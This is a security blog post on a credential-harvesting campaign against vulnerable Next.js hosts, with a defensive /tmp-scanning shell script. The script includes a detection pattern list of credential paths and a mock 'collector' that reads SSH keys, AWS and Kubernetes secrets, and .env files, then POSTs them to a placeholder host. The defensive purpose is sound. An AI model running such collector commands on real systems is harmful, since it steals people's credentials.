**Hacker Pranks**

**Large-Scale Credential Harvesting Operation Exposes 766 Hosts: What You Need to Know**

A recent large-scale automated credential harvesting campaign, tracked by Cisco Talos as UAT-10608, has been compromising web application hosts and stealing sensitive data at scale. The operation uses a purpose-built framework dubbed "NEXUS Listener" to target Next.js applications vulnerable to React2Shell (CVE-2025-55182).

The campaign's methodology is to identify vulnerable endpoints, exploit React2Shell to gain execution on the host, and then deploy a multi-phase credential harvesting tool that collects credentials, SSH keys, cloud tokens and environment secrets. The framework uses a staged payload delivery model: shell scripts dropped in /tmp gather the data and exfiltrate it to the operator's infrastructure.

**Automated Credential Harvesting: A Growing Concern**

The breadth of this campaign is staggering: at least 766 hosts were compromised across multiple geographic regions and cloud providers within a 24-hour period. The indiscriminate targeting pattern suggests that the threat actors are not selecting victims but using automated scanning to enumerate publicly reachable Next.js deployments and probe each one for React2Shell.

**NEXUS Listener: A Sophisticated Credential Harvesting Tool**

The core component of the framework is a web application that presents all exfiltrated data to the operator in a graphical interface, with statistics, search and browsing functions for sifting through the stolen material. The observed NEXUS Listener instances display "v3" in the page title, indicating that earlier iterations preceded the version currently in use.

**Exfiltrated Data: A Goldmine for Threat Actors**

The analysis reveals that the framework collects a wide range of sensitive data from compromised systems, including:

* Third-party API credentials
* Complete PEM-encoded private keys and authorized_keys entries
* IAM role-associated temporary credentials (AWS)
* Kubernetes tokens (GCP/Azure)
* Docker container information

With this data an attacker can authenticate to cloud resources as the victim, move laterally to any host that trusts the stolen SSH keys, or escalate privileges on the compromised systems.

**What Can You Do?**

Organizations should immediately investigate their web application hosts for signs of this campaign's activity. This includes searching for the following artifacts:

* IOCs published in the GitHub repository linked under References
* Connections to NEXUS Listener instances (the observed instances identify themselves as "v3" in the title)
* Next.js deployments still vulnerable to React2Shell (CVE-2025-55182)
* Suspicious or unexpected shell scripts in /tmp
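A host-side triage script for the staged /tmp scripts described in the methodology above and for the "suspicious shell scripts in /tmp" check in this list, as an added example that is not Talos's tooling or anything recovered from the campaign: it flags shell scripts whose contents reference the credential sources the report says were harvested (SSH keys, AWS credential files, the instance metadata service, Kubernetes service-account tokens, .env files, docker state) and an outbound upload. The indicator list, the MIN_HITS threshold, the file and function names, and the sample "collector" it builds for a dry run are all assumptions made for this example; the real IOCs are in the linked repository.

```shell
#!/bin/sh
# triage_tmp_scripts.sh: flag shell scripts in a directory (default /tmp)
# that read the kinds of material this campaign harvests. Added example,
# not the Talos or campaign tooling; the indicator list below is an
# assumption derived from the data types the report says were collected,
# not a published IOC set.

# Indicator regex (ERE). Each alternative is a string a collector script
# would plausibly contain; matches are counted as distinct strings.
PATTERNS='\.ssh/|authorized_keys|id_rsa|id_ed25519|\.aws/credentials|AWS_SECRET_ACCESS_KEY|169\.254\.169\.254|metadata\.google\.internal|serviceaccount/token|\.env|docker (ps|inspect)|-d @|--data-binary @|--upload-file'

# Minimum number of distinct indicators before a script is reported (assumed).
MIN_HITS="${MIN_HITS:-3}"

# Count distinct indicator strings in one file; prints an integer (0 if none).
indicator_count() {
  grep -Eo "$PATTERNS" "$1" 2>/dev/null | sort -u | wc -l | tr -d ' '
}

# True if the file is a shell script: a .sh name, or a sh/bash/dash shebang.
is_shell_script() {
  case "$1" in *.sh) return 0 ;; esac
  head -n 1 "$1" 2>/dev/null | grep -Eq '^#! ?/(usr/)?bin/(env )?(sh|bash|dash)'
}

# Scan one directory (dotfiles included, since droppers favour hidden names)
# and print "<hits> <mtime> <path>" for every script at or above MIN_HITS,
# highest score first.
scan_dir() {
  dir="$1"
  for f in "$dir"/* "$dir"/.[!.]*; do
    [ -f "$f" ] || continue
    is_shell_script "$f" || continue
    n=$(indicator_count "$f")
    [ "$n" -ge "$MIN_HITS" ] || continue
    mtime=$(stat -c '%y' "$f" 2>/dev/null || stat -f '%Sm' "$f")
    printf '%s\t%s\t%s\n' "$n" "$mtime" "$f"
  done | sort -rn
}

# Constructed sample directory for an offline dry run. The hidden "collector"
# is a mock-up written for this example, not a real campaign artifact, and
# example.invalid is a placeholder exfiltration host.
make_sample_dir() {
  d=$(mktemp -d)
  cat > "$d/.collect" <<'EOF'
#!/bin/bash
cat ~/.ssh/id_rsa ~/.ssh/authorized_keys > /tmp/.x
cat ~/.aws/credentials >> /tmp/.x
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ >> /tmp/.x
cat /var/run/secrets/kubernetes.io/serviceaccount/token >> /tmp/.x
docker ps -a >> /tmp/.x
find / -name .env -exec cat {} \; >> /tmp/.x 2>/dev/null
curl -s -X POST -d @/tmp/.x http://example.invalid/collect
EOF
  # Benign maintenance script: no indicators, must not be reported.
  cat > "$d/cleanup.sh" <<'EOF'
#!/bin/sh
find /var/log -name '*.gz' -mtime +30 -delete
EOF
  # Not a script at all: mentions credential paths but is skipped.
  printf 'rotate ~/.ssh/id_rsa and ~/.aws/credentials quarterly\n' > "$d/README.txt"
  printf '%s\n' "$d"
}

# Usage: sh triage_tmp_scripts.sh [dir]    (no argument: scan /tmp)
scan_dir "${1:-/tmp}"
```

Run it on each web host and review anything it lists, together with the reported mtime, against the host's deployment history. A hit is a lead, not a verdict: a legitimate deployment script that reads .env files and uploads a file with curl will also score, so compare flagged files against the published IOCs and check whether they appeared around the time of an exploitation attempt against the Next.js endpoint.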

The sooner you take action, the better equipped you'll be to mitigate this threat and protect your sensitive data.

**Stay Vigilant**

This campaign serves as a stark reminder of the importance of robust cybersecurity measures. Stay informed about emerging threats, patch vulnerabilities promptly, and implement robust monitoring tools to detect suspicious activity on your network.

By being proactive and taking steps to secure your web applications, you can significantly reduce the risk of falling victim to large-scale credential harvesting operations like UAT-10608.

**References**

* Talos report: [link]
* GitHub repository (IOCs): [link]
